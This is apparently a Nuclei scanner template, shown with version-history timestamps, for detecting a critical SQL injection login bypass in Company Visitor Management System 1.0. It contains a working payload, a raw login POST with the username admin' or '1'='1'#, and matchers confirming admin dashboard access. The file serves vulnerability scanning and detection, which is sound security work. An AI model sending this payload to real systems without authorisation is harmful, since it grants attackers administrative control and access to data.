nuclei-templates/vulnerabilities/other/cvms-sqli.yaml

46 lines
1.3 KiB
YAML
Raw Normal View History

2022-07-21 07:27:46 +00:00
id: cvms-sqli
info:
name: Company Visitor Management System 1.0 - SQL Injection
2022-07-21 07:27:46 +00:00
author: arafatansari
severity: critical
2022-07-21 07:27:46 +00:00
description: |
Company Visitor Management System 1.0 contains a SQL injection vulnerability via the login page in the username parameter. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-07-21 07:27:46 +00:00
reference:
- https://www.exploit-db.com/exploits/48884
- https://packetstormsecurity.com/files/158476/Company-Visitor-Management-System-CVMS-1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-89
2022-07-25 18:11:06 +00:00
metadata:
verified: true
tags: cvms,sqli,auth-bypass,cms,edb,packetstorm
2022-07-21 07:27:46 +00:00
requests:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-25 18:11:06 +00:00
username=admin%27+or+%271%27%3D%271%27%23&password=nuclei&login=
2022-07-21 07:27:46 +00:00
host-redirects: true
2022-07-21 07:27:46 +00:00
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-07-25 18:09:57 +00:00
- 'Admin user'
2022-07-21 07:27:46 +00:00
- 'Dashboard'
2022-07-25 18:09:57 +00:00
- 'CVMS'
condition: and
2022-07-21 07:27:46 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28